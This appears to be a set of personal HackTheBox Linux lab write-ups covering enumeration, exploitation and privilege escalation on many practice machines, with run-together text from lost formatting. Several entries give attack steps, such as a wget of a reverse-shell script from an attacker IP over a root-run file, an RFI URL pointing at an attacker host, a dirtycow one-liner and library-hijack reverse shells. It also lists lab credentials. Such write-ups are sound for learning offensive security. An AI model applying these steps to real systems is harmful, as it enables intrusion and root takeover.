HTB : Linux
Sense
Enumeration , Open-source exploit
Directory enumeration leads to credentials , through which able to login to website
Open exploit leads to command-injection , giving direct access to root
Nibbles
Initial ⇒ view-page-source , Directory Enumeration , Open-exploit Privesc ⇒ sudo -l , ------------------------------
nmap gives 22,80 . On port 80 static html page , however ⇒ view-page-source leads to interesting comment which disclose directory
nibbleblogGobuster on http://$ip/nibbleblog gives :
admin.php : login page
README : version disclose
nibbleblog v4.0.3/content : /content/private/users.xml ⇒ leaks username
admin
Open-exploit available (Code Execution) ⇒ https://github.com/dix0nym/CVE-2015-6967
Inside shell doing
sudo -lgives/home/nibbler/personal/stuff/monitor.sh
Node
------------------
Viewing website (3000) gives some usernames and checking
app.jsusing Dev-Tools leaks the usernames & hashes.Using these creds on the same website leads to get authenticate as user
admin accountfrom where i can download the backup file.Decoding file.backup with base64 ⇒ file.zip , unzipping it gives hash ⇒ cracking the hash gives ⇒ SSH creds for user
markps -auxxgives 2 file running as usertom
Solidstate
Initial ⇒ rsip , pop3 Privesc ⇒ pspy32 , script-modification
Exploiting
rsip(4555) with default credentials leads to user enumeration and password change.Using those username with changed password on
pop3(110) leaks SSH creds in usermindymail.Getting shell as
mindy& runningpspy32gives a script/opt/tmp.pyrunning as rootModifing the script and putting reverse shell in it gives us the shell as root.
Valentine
Initial ⇒ Director Enumeration , Hexdecimal dump (xxd) , SSH passphrase crack Privesc way 1 ⇒ history + tmux || Privesc way 2 ⇒ dirtycow
Nmap gives 22,80,443 & --script vul states 443 is vulnerable to
heartbleedvuln.Interesting Dir-enum findings :
/dev/hype_keywhich containds hexdecimalxxd -r -pgives ssh_private_key & for passphrase we can decrypt it viaopensslFor privesc we have 2 paths :
tmux
dirtycow
ps -pfgives tmux is running & history commands gives tmux socket pathtmux -S /.dev/dev_sess ⇒ running this gives root
uname -agives version 2012 , searchsploit gives dirtycow exploit for this versiongcc -pthread dc.c -o c -lcrypt && chmod +x c && ./c ⇒ gives a username
randomsu random⇒ gives root
Poison
Initial ⇒ Enumeration , Log-poisoning || phpinfolfi.py || SSH Pirvesc ⇒ Process check , internal network scan , port forwarding
Nmap gives 22,80 . On port 80 website is running which allows to read local php files , which is also vulnerable to LFI
pwdbackup.txt ⇒ gives base64 encoded pass
/etc/passwd ⇒ gives username
charixphpinfo ⇒ file_upload is on (but not able to find neither functionality nor upload dir)
1st way is doing ssh as charrix , password =
Charix!2#4%6&8(02nd way of exploitation is log poisoning
3rd way is using phpinfolfi exploit {payloads all the things}
ps -auxwgives vnc is running & doingnetstat -anlpgives port 5801 , 5901After SSH tunneling ,accessing the port 5901 give me shell session with root user
Sunday
Initial ⇒ Finger (79) brute force Privesc ⇒ Enumeration , sudo -l , wget , overwriting file/binary
Nmap gives the following result :
79 : finger ⇒ nmap result discloses the username
sunny & sammy111 : rpcbind
22022 : SSH
Brute forcing fingers users using exploit :-
http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
Same as nmap , interesting usernames found : sammy & sunny guessing password
sundayand doing SSH gives the shellin root location
(/)there is unusuall directory/backupwhich contaiansshadow.backupfile which basically backup file for /etc/shadow , reading it gives hash for both usersammy & sunnyDoing
sudo -lfor both user gives :sammy :
wget⇒ we can read files , upload filesunny : /root/troll ⇒ we can run it as sudo (nothing extra than this)
Combining both we can overwrite /root/troll using wget with our python reverse shell
sudo wget http://10.10.14.5/shell.py -O /root/troll
Tartarsauce
Initial ⇒ Recon , Dirsearch , wpscan , wordpress plugins manuall check Privesc ⇒ ----------------------
Only port80 is open ⇒ static website , dir-enum gives /webservices , still nothing useful
Dir-enum inside /webservices , gives /wp ⇒ site is using wordpress
wpscan enumeration found nothing vulnerable , 3 plugins found :
Manually checking the README of the plugins gives something interesting
So basically , the real version is 1.5.3 , some recon gives on of the plugin
gwolle-dbis vulnerable on this versionRFI in gwolle-gb v1.5.3 by visiting the link : http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://ip/path
start python server , put a php reverse shell , rename it to wp-load.php , curl it ⇒ shell
Irked
Initial ⇒ IRC (6697) , open-exploit Privesc level 1 ⇒ Enumeration + steg pass cracking Privesc level 2 ⇒ script modification
80 ⇒ an emoji is on the website , nothing else
6697 ⇒ irc running , googling it gives an open-exploit , which gives shell as user
ircdexploitIn
/home/djmardov/Documentsfound .backup file , which has steg passwordwget image , crack it using steg pass we get a new pass which work on both ssh & su
Got shell as
djmardov, run linpeas.sh gives an unusall binary /usr/bin/viewuser , executing it gives this error :
create same name executable , insert rev shell , run viewuser ⇒ shell as root
Friendzone
Initial ⇒ Recon , combining file-upload via SMB & execution LFI Privesc level 1 ⇒ recon , mysql creds Privesc level 2 ⇒ Python Library Hijacking , script modification
Nmap & recon are as follows :
139/445 ⇒ SMB recon , with anonymous login gives
//10.10.10.123/Development ⇒ read & write access
//10.10.10.123/general⇒ creds.txt
80 ⇒ disclose domain name
friendzone.red53 ⇒ DNS recon gives some subdomain name , useful : administrator1.friendzone.red\
administrator1.friendzone.red⇒ Login page (creds form smb works here)
On
administrator1.friendzone.redgives 2 parameter image_id & timestamptimestamp is vulnerable to LFi , put php rev-shell in
../../../etc/development,using smb and accessing it gives shell aswww-dataIn
/var/www/mysql_data.conf, db_user & db_pass available which work for ssh & suAfter getting shell as user
friend, running pspy shows python script sunning as root in/opt/server_admin/reporter.py, on some line there isImport osin
/usr/lib/python2.7there is os.py which is writable , Insert rev shell inos.py, start listener , got shell as root
Swagshop
Networked
Initial ⇒ File upload with double extension & exiftool to manipulate magic-bytes Privesc level 1 ⇒ Recon in /home dir , cron files , Input manipulation Privesc level 2 ⇒ sudo -l , Input manipulation in shell script
Recon & Enumeration
port scan
directory scan
http://friendzone.red
Just a basic web page , nothing here But there is a " Email us at: info@friendzoneportal.red " , we can use "riendzoneportal.red" for further enumeration
https://friendzone.red
just a gif , nothing informational
/wordpress
Forbidden <not-useful>
Samba Enumeration
I tried listing files & anonymous login ....... and succeded , their is file present in "general" directory which contains "creds.txt" , i got credentials for admin user i tired them in ssh , ftp .... and failed Lets enumerate samba more
and after the recon , i get to know the path of all directories and filles in samba , i will focus on those directires which are benificial for me
DNS Zone Transfer
Listing all domains for both "friendzone.red" & "friendzoneportal.red" and then add all the domains in /etc/hosts file
At first i opened all domains with http ....but they return the same page which i found on port 80 then i open all of them with https:// , and i get alot of domains which are working but their are 2 domians through which i used solved the box https://administrator1.friendzone.red/ >> login page https://uploads.friendzone.red/ >> has upload functionality
i first tried incorrect creds and got response "wrong" then i used creds , found in samba and got login and the page says "login success please visit dashboard.php"
/dashboard.php
the page says visit "image_id=a.jpg&pagename=timestamp" , and in response i get a picture and timestamp number , i think its vulnerable to LFI
I upload a php shell on this , and its succesfully uploaded , time for LFI , i already have 2 parameters :-
LFI
/dashboard.php?image_id=a.jpg&pagename=timestamp
LFI in image_id
i changed the value to a.jpg => shell.php but no reverse shell then i tried again n agian, but didn't get anything ..... thats weird
directory scan
/images their only 2 images here , a.jpg and b.jpg it means my shell was not uploaded here , maybe their is any other directory where my shell is uploaded
LFI in pagename
then only option left is this , lets change the value with the directories and file name found in scan timestamp > response shows the timestamp number login > response shows "wrong" i guess , its reflecting the content of the page-name inserted here , i think its vulnerable to LFI to get sure i am going to request the "php source code file" payload :-
shell as www-data
After reading the source-code of dashboard , i get to know that the parameter "pagename" is taking the value and adding a ".php" after the value and then shows the content of that particular file I tried pagename=../../../../etc/passwd and fail , =/etc/passwd still fail , i think its bcoz ist adding a ".php" extension in the end of file But after samba enumeration , we know the "Development" & "general" directroy are present in "/etc/" directory Lets make a echo.php file and put it into one of the smb-directory and then try to read it Unfortunately we don't have write permission in "general" , only option left is "Development"
NOTE :- i did not add echo.php in the payload , as i alerady know that the script do it itself Both payloads are working fine , time to upload a reverse shell and BOOM.......we got the shell
privesc www-data => friends
find a mysql config file in /var/www directory , inside the i got the credentials for user "friend"
we can do both ssh as well as switch user to get a shell as "friend"
privesc friend => root
pspy
after running the script , i found a cronjob which is running a python script :- /opt/server_admin/reporter.py Their is nothing much in the script but it was importing an os library in the script then i start searching "os.py" , in order to perform python library hijacking i found os.py and it is also writable ....great , lets insert reverse shell in bottom of the script- "os.py" NOTE :- I removed the "os" keyword from reverse shell as we already injecting the payload in os.py Orignal payload :-
Modified payload :-
after injecting i waited for few minutes to let the cronjon do it work , and after some time BOOM....... we got the shell as root.
Jarvis
Initial 1 ⇒ SQL-injection , Extracting PHPmyadmin creds , php shell upload Initial 2 ⇒ Direct web-shell upload using SQL-injection Privesc level 1 ⇒ sudo -l , command injection in python script Privesc level 2 ⇒ linenum.sh , SUID , /bin/systemctl , fake service exploitation
nmap
port open :- 22 , 80 , 64999
gobuster
directories found :-
server-status/ , phpmyadmin/ , room.php
website (80)
Their is a website running on , which has some functionality of check room (price , description , room name , rating....etc) ans it seems exploitable through sql injection lets try.... , but before that
/phpmyadmin/
Their is a phpmyadmin login page is running on the website. although i already tried the default credentials but didnt get anything , wen need credentials for that
website (64999)
Nothing over here , just some text "you have been blocked for xxx seconds , don't be bad"
shell as www-data
way 1 - shell upload via phpmyadmin
we are logged in. After looking the application i get to know the application version which is :- "phpmyadmin 4.8.0" lets look for any public exploit availble for this :- " searchsploit phpmyadmin | grep '4.8' " & we got 2 exploits for that According to the payload we are able to do LFI and also LFI to RCE for that we have to first run sql query and the we have to visit the url including the session id 1st lets copy session id => "phpmyadmin" cookie 2nd run sql query
3rd visit the link including the session id and command in "cmd" parameter
4th inject reverse shell in "cmd" parameter
way 2 - Direct shell upload
As we know we can write a file using sql injection & the webpage directory is /var/www/html , lets try uploading reverse shell. payload :-
lets visit the page try the command injection http://10.10.10.143/rev.php?cmd=whoami, it works lets add reverse shell command
privesc www-data => pepper
sudo -l
i got a file "/var/www/Admin-utilities/simpler.py" which i can run with sudo (pepper) privileges , first lets read the "simpler.py" basically the script is used to -h help -l list attackers ip address -s chack attack status -p ping an ip address here in "-p" the exec() function is been called , which executes the ping command , we can use command injection in this but their list of forbidden charecters :- ` , - , | , || , ~ , & , && , ; Note :- we can still run $(command) to do a command injection in script
i got the shell as pepper , but its not fully functional as the commads are running , but result is getting on screen To fix this , i first create a shell script (shell.sh) in /tmp directory and put a reverse shell in that and then do the command injection in "simpler.py" in order to execute my reverse shell script
And BOOM we got the shell as pepper
privesc pepper => root
run linenum.sh
after running the script , we get a binary which both pepper and root can run => "/bin/systemctl" systemctl is is a systemd utility which is responsible for Controlling the systemd system and service manager. That is, it creates and manages services Lets create a malicious service and run it using sysemctl and BOOM.......we got the shell as root.
Mirai
Popcorn
Initial ⇒ PHPinfo , File-Upload Privesc ⇒ Kernel Exploit , 1 ⇒ Full-Nelson.c || 2 ⇒ DIrty-Cow
Website and SSH is open , directory enum gives 2 interesting dirs :- /test & /torrent
/test ⇒ Shows phpinfo page ( file upload is enabled)
/torrent ⇒ Login & Sign-Up page is running
After creating user and sign-in i got a upload form , which accepts only torrent file nothing else. (php webshell not allowed)
After uploading .torrent file , we get another upload functionality for screenshot
uploading php-webshell gives success & response disclose upload path
/torrent/upload/Navigating to path , we see our webshell , triggring it gives reverse shell
uname -a / uname -r, gives the vulnerable linux version 2.6.37, upload and execute any exploit gives us root.Full-Nelson.c ⇒ https://www.exploit-db.com/exploits/15704
DirtyCow
Haircut
Initial ⇒ RFI (curl) ⇒ PHP shell ⇒ RCE Privesc ⇒ Find command , Screen-4.5.0 , pwnkit
On website , able to perform RFI on Local/Remote Host (as curl running in background).
Used RFI to upload php webshell , which can be triggered from site/uploads.
Got shell as
www-data, for privesc used pwnkit leads torootAlternate privesc ⇒ screen-4.5.0
Blocky
Initial ⇒ wordpress scan , directory enumeration Privesc ⇒ sudo -l , sudo su -
Recon & Enum
port scan
directory scan
wordpress scan
nothing intresting over here
website
their is nothing much on the website , but if you click on the post (only post available on the web page) you found username "notch"
i found 2 jar files over here , then i used jd-gui to discover the content
blockycore.jar
i found root password in this file
shell as notch
now we have 2 username :- notch & root and 1 password :- 8YsqfCTnvxAUeduzjNSXe22 i tried notch with password and it worked , i got the shell
privesc notch => root
Frolic
Initial ⇒ Enumeration , Encrypt/Decrypt , open-source exploit RCE in playsms
Privesc ⇒ Buffer overflow x-x-x-x SKIPPING x-x-x-x
recon & Enum
port scan
http page on port 1880 & 9999
smb enumeration
nothing intresting over here
directory scan
http://10.10.10.111:1880
http://10.10.10.111:9999
ngnix server default page is running on and it also discloses the domain name :- http://forlic.htb
Node-red login page is running on , i need creds for that
we got php-info , after checking a little i got this :- allow_url_include Off , this means LFI is not possibe
i got 2 files & 1 directory user.txt = admin pass.txt = imnothuman loop = nill i tried these creds on node-red login page but it failed
another login page , but when i try to intercept request i got nothing , in sorce code i got a file :- login.js this file was also founded by feroxbuster & it contains creds for this page :- username = admin , password = superduperlooperpassword_lol
after successful login we got redirected to :- http://10.10.10.111:9999/admin/success.html and this page contains :- ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.
after googling a little , i get to know its an Ook language when i decoded it i get this
i got this :- UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA
i decoded it with base64 and save it as new file and then run file command on this file and i get to know that its a zip file so i saved it as file.zip and i tried to unzip it , but it needs a password , then i run fcrackzip on it and got the password = password after unzipping it i got a file index.php which contains hex :- 4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a after doing hex to text i got this :- KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg== another base64 decode required :- +++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+ ++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->--- <]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..< another Ook decode required :-
Finally we got the password , but its not working for Node-Red login page , but it did work for playsms page. we got in after doing searchsploit i found a exploit which does work on playsms to get RCE
shell as www-data
create a csv file and add the payload in it
upload it and intercept the request in burp & change the user-agent to command which i want to execute . for e.g. whoami
enter the reverse shell in user-agent
and we get the shell as www-data
shell as root
it requires buffer overflow , so i skipped it
Postman
Initial ⇒ Redis , SSH-key upload Privesc ⇒ ----------
Recon & Enumeration
port scan
directory scan
for http://10.10.10.160/
website (80)
Nothing intresting over here , just a static web page with no functionality
https://10.10.10.160:10000
Their is login page powered by "WEBMIN" , by default webmin doesn't have any default credentials i also tried sql & no sql injection ...... no benifit , we will look back here after a while
/upload
just bunch of images , almost no one is opening or have something intresting ....i moved on
redis 6379
we can connect with redis just using net-cat , and we can execute commands
shell as redis
i created a ssh pub-pri key pair and then i used the redis server to import and save the key i authorized keys , after that just do the ssh in system as redis user and , we got the shell Importing ssh key :-
Saving ssh key in authorized keys :-
privesc redis => Matt
linpeas.sh
I found a SSH RSA private key for Matt user , so i first used it for direct ssh login......didn't work next thing , i extracted the key contents (hash) by using ssh2john , we can also extract that online after extracting the hash from key , we need to crack it , for this i used john
i used the key and password and ........i still got fail , so i tried "su - Matt" in the shell i already have and i succeeded ......got the shell as Matt
privesc Matt => root
These credentials also work for webpage we found earlier , we kind of need metasploit payload to do that , so i just skip it
Mango
Initial ⇒ No-SQL-injection , Enumeratin database & finding credentials Privesc ⇒ linpeas.sh , Binary exploitation (jjs)
port scan
port 22 , 80 , 443 are open script scan :- give us a name of the domain running on port 80 domain name :- staging-order.mango.htb
website (80)
the page returns 403 <forbidden> on ip address , i think we have to add the host in etc/host before we access this page. yes ..... now its working with admin pannel on it
directory scan
i done 2 directory scan one for <http://staging-order.mango.htb> & other for <https://10.10.10.162>
i found some php and json files in this directory and i find this particular json file useful
After reading the file i get to know that , the application is using MongoDB on server side ......this gives a shot to test Nosql injection
No-sql injection
shell as mango
i used payload to bypass the authentication , but their is nothing inside .......i need credentials, so as we dealing with nosql we can use some payload or script in orderto retrieve data i used script but here are also some manual payloads :-
i got credentials , now lets try ssh i tried admin creds first but i fail , so i tried mango creds and BOOM......we are in
privesc mango => admin
and enter password we found using nosql injection
privesc admin => root
linenum.sh
i found a binary name "jjs" in path "/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs" with both SUID lets do some search and i found something on GTFObins its a java binary which can be use for :- file read file write reverse shell and some more functionalities ...... i first tried reverse shell , but i get the shell with again admin user , but i need it as root user Next i tried file read , but it wouldn't work for me , now only option left for me is to a write a file so , i decided to write ssh key using jjs so i came back to my machine :-
i named the file "mango" and i got 1 private key "mango" & 1 public key "mango.pub" we use public key to write it in target machine and use private key to login, so i copied the "mango.pub" content and paste it inside jjs file-write payload & directory = /root/.ssh/authorized_keys login using private rsa key
Traverexec
Openadmin
Magic
Initial ⇒ Auth bypass via sql-inj OR Match-&-Replace 302 to 200 (EAR) + file upload Privesc level 1 ⇒ Database creds in /var/www/magic + Data dump using mysqldump Privesc level 2 ⇒ -----------------------
Recon & Enum
port scan
directory scan
website
their is bunch of images on web page and their is also login functionality on bottom left corner of web page
http://10.10.10.185/login.php
This can be bypass using sql authentication attack , after getting login we got redirect to /upload.php which has file upload vulnerability
http://10.10.10.185/upload.php
if we directly visit this page it redirects us to /login.php , but when intercepted the respeonse in burp and after checking page content and page size it shows the same page , To bypass this use burp - match and replace from 302 found -> 200 ok
shell as www-data
file upload exploitation
we can use 2 methods to exploit this vulnerability :- 1. using exiftool to inject reverse shell into image we are uploading 2. injecting payload in middle of the file image content i used second , and got the shell
privesc www-data => theseus
after getting shell , i found 1 more file inside /var/www/magic directory
db.php5
This is mysql file , after reading the file we get to know the credentials of mysql of user theseus but unfortunately mysql is not present in machine , but their is mysqldump present , we can use this
after the dump , we got the result. inside result i found this which i think is interesting
i use su command with creds username = theseus & pass = Th3s3usW4sK1ng , and got the shell
privesc theseus => root
linenum.sh
found unknown binary > /bin/sysinfo , and it also executable as root
Admirer
Initial ⇒ SSRF to My-SQL fake server (attacker server) Privesc ⇒ Path Hijacking (PYTHONPATH) , Scripting Library (shutil.py) & function
Nmap gives 21,22,80 port open with disallow entry :
admin-dirin robots.txtRecon on http://$ip/admin-dir gives 2 .txt files
contacts.txt ⇒ Holds email-address & username (NO USE)
credentials.txt ⇒ Holds FTP username & password
Loggin-in & enumerating it gives us files :
dump.sql ⇒ (Nothing interesting except Database Name : admirerdb )
html.tar.gz ⇒ extracting it gives some directories and files , intereseting one :
/utility-scripts
/utility-scripts/dbadmin.php (Holds username
waldo, password & database)
Emumerating
http://$ip/utility-scriptsgivesadminer.php, which has mysql connect running on it , {tried the creds i found , but didn't work}Using
serverfield , we can also connect to remote server , i set up the mysql on my attacking machine and set user/pass , logging in to it , gives accessAfter getting inside , i loaded the local file and viewing it gives me another creds for
waldo whichwork for SSHInside SSH session , doing sudo -l gives a file : /opt/scripts/admin_task.sh for which SETENV is available , reading it gives on
function 6it runs a script/opt/scripts/backup.pybackup.py is importing make_archive from shutil library
Creating a
shutil.pyfile/library inside /tmp directory and injecting reverse shell in it.
Exploiting using sudo right on path-variable (SETENV) and also on
/opt/scripts/admin_task.sh
Blunder
Tabby
Doctor
Initial ⇒ via SSTI or via Command Injection
Privesc level 1 ⇒ Password in /var/log/apache2/.backup
Privesc level 2 ⇒ -------------------------
Recon & Enum
port scan
directory scan (http://10.10.10.209)
directory scan (http://doctors.htb)
website (http://10.10.10.209)
i found nothing useful here , but i did found mail address - info.doctors.htb , lets add it add it to /etc/hosts and check
website (http://doctors.htb)
we got login page and also a sign up functioality , lets create an account on this After getting in we get message functionality which consist of 2 parameters
after posting message it looks like this :-
shell as web
Both parameters are vulnerable . para 1 is vulnerable to SSTI & XSS , para 2 vulnerable to command injection
SSTI
i injected payload , but none of them is working until i checked the /archive , 9x9 didnt give any result , i don't think its vulnerable to SSTI but 8x8 wworked for me
its working lets take reverse shell
I thought it didn,t work , but no we have to send requestnin archieve as well , after hitting the send from /archive i got this as response and reverse shell as well
command injection
i start testing it by injecting my ip , but it gave an error
trying $IFS payload and it worked :-
after that i just bash /dev/shm/exploit , and i get the reverse shell
privesc web => shaun
and i found this :-
i tried su - with username = shaun & password = Guitar123 , and i got the shell
privesc shaun => root
Sneakymailer
Initial ⇒ Recon , Phishing , ----- Privesc ⇒ ----
Recon & Enum
port scan
nmap gives domain name = http://sneakycorp.htb
directory scan
subdomain scan
website
page consist of names and emails , nothing more . I can download all email address of the users
register page , but no redirection or action performed
shell as www-data
phishing users
i will try to send phishing mail containing my ip address in the message body , and i open python server on my machine If any user clicks on my ip address i will get a call back
i did get a call back on python server , now i will open nc to check what i get
i got creds for paul
Passage
Lunanne
Time
Initial ⇒ Recon , Open-Exploit (com.fasterxml.jackson.databind) Privesc ⇒ Linpeas.sh , ----
Recon & Enum
Port scan
Directory scan
WEB (80)
Their is a json beautifier & validator working on website , after testing it , i get to know that the beautifier is of no use for us , so only thing left is validator Basically if we input json data in it , it validates it and give response accordingly , But if we input normal data then it will give us error :-
After googling and reading walk-through , i found that this is a CVE-2019-12384s
Shell as pericles
their is public exploit available on github , through which we can perform SSRF to RCE Steps to reproduce :- 1. clone the git repository in your machine 2. open and edit the sql file and enter the command you want to get executed on target machine/server , in my case its reverse shell 3. start a http server on your local machine 4. edit the payload & accordingly :- ip address , port no. , sql file name 5. remove all the "\" with " " (blank space) using echo command :-
final payload :-
Turn on the netcat listner on your machine , and BOOM.......... we got the shell
privesc pericles => root
Ready
Initial ⇒ SSRF -> redis RCE (open-exploit) Privesc ⇒ Backup file in /opt
On port 5080 website is running the gitlab , enumeration gives us the outdated version
(11.4.7)Open Exploit available , for explanation of the vulnerability refer
For privesc, found password :
wW59U!ZKMbG9+*#hingitlab.rbfile located in/opt/backup
Delievery
Initial ⇒ Register & Enumeration
Privesc ⇒ /opt/mattermost ⇒ config.json ⇒ mySQL creds ⇒ (MySql-CLI) ⇒ root
Nmap gives 22,80,8065
80 : support ticket is running ⇒ we can create and tract the status of ticket
8065 : Mattermost running ⇒ we can register (with email confirmation) & login
Create the ticket on port:80 website using the fake email , track the status of ticket using the same fake email , on port:8065 website register the same fake email , the confirmation mail goes directly into ticket status , click on confirming link and then we login back to mattermost website
Inside it we are able to find SSH creds for user
maildeliverInside Shell
/optdirectory containsconfig.jsonfile which leaks mysql credsUsing those creds and doing some mysql emum with CLI , we are able to find hash for root user.
Ophiuchi
Scriptkiddie
Armageddon
Initial ⇒ Open-source exploit (Drupal 7 v7.56)
Privesc level 1 ⇒ Database creds in /var/www/html/sites/default/setting.php
Privesc level 2 ⇒ Binary exploit snap install * , Crafting malicious snap package
Recon & Enum
port scan
directory scan
website
their is login page running on , after enumerating in burp i found that the webiste is php based and using drupal for authentication
http://10.10.10.233/CHANELOG.TXT
I found the exact version number of drupal
shell as apache
searchsploit
their are lots of payload on it
but this matches according to our needs :- version no. Unauthenticated non-metasploitable public exploit on github
CVE 2018 - 7600
this will give us shell as apache , and provide a link "http://10.10.10.233/shell.php" with parameter "c" through which we can do RCE lets get a reverse shell first ..... double-encode the payload while injecting NOTE :- we get this shell /sbin/nologin , so their are lots of things we can not perform like :- cd , bash , python , nc , wget ..... etc , and for some other things it gives Permission Denied
privesc apache => brucetherealadmin
we can do enough here , in order to escalate our privilages i need some kind of credentials , because most of the commands are not working and i even can't transfer scripts to victim like linpeas or etc....... After doing google , i get to know where are default credentials of database are stored :- "/sites/default/setting.php"
we got database (drupal) credentials , "drupaluser" & "CQHEy@9M*m23gBVj" before run mysql commands , we don't have ptty shell , so we have to direct execute the sql query in single go , so that terminal didn't stuck , as it stuck without that
we got hash for user "brucetherealadmin" , lets save it in file , then find hash type then crack it
i tried switching user but didn't work , so i tried ssh and got the shell as brucetherealadmin
privesc brucetherealadmin => root
sudo -l
found a binary that i can run as root :-
i immediately gone to GTFObins , and found this
this says , this binary can't do anything on its own , Basically its a package manager to install packages just like apt , but we can creat a malicious package , and then try to install it
creating malicious package
first i just try to read the root.txt, so create the package in attacker machine then transfer it to victim and then use snap to install it
we got , root.txt , but not shell
Knife
Initial ⇒ Recon , Open-exploit
Privesc ⇒ sudo -l , Binary Exploitation :- /usr/bin/knife
Recon & Enum
port scan
directory scan
website
nothing interesting over here , just a static page Although we intercepted in response shows php version
shell as james
we can search exploit for this , after searching i got this exploit :-
privesc james -> root
after searching on GTFObins , i got this :-
and i got the shell as root
Pit
Seal
Previse
Initial ⇒ EAR , Command Injection
Privesc level 1 ⇒ MySQL creds in /var/www/something/config.php
Privesc level 2 ⇒ sudo -l , Path Injection in execution of shell script
Recon & Enum
port scan
directory scan
Nothing new finding , what is discoverable in this , is already accessiable by web page
website
http://10.10.11.104 -> redirects -> http://10.10.11.104/login.php
when i entered the ip "10.10.11.104" ir redirects me to "10.10.11.104/login.php" , so their is login page i use EAR vulnerability to bypass the login page
http://10.10.11.104/logs.php
we got functionality to download logs with specified delimeter :- comma , space , tab
shell as www-data
I captured the request in burp , and in delimeter parameter i tried command injection and it worked , then i injected the rev shell and i het the call back on my listner
privesc www-data => m4lwhere => root
www-data -> m4lwhere
on http://10.10.11.104/acounts.php their is functionality to download the site abckup file , i downloaded it and after unzip i got bunch of files
lets connect to mysql , and i get the hash for user "m4lwhere"
after cracking it i got the password ilovecody112235! , su / ssh ....and got the shell as m4lwhere
m4lwhere -> root
i did sudo -l and find a file
the problem is not in script , the thing is that the "gzip" binary with root priviledges , so i can simply inject my current path in path variable and make a fake binary with the name gzip and inject my rev_ shell in it and after that just execute gzip ... and got the call back on my nc listner
privesc www-data => root
linpeas.sh
linpeas found that the application is vulnerable to cve-2021-4034 , so i googled it
run this , and get the shell as root https://github.com/berdav/CVE-2021-4034
Forge
Initial ⇒ SSRF (http://) chaining with another SSRF (ftp://) , Recon
Privesc ⇒ Recon in /opt , Script Breaking , PDB (python debugger)
Nmap gives 21 : filtered & 22,80 : open , subdomain enum gives
admin.forge.htbOn website
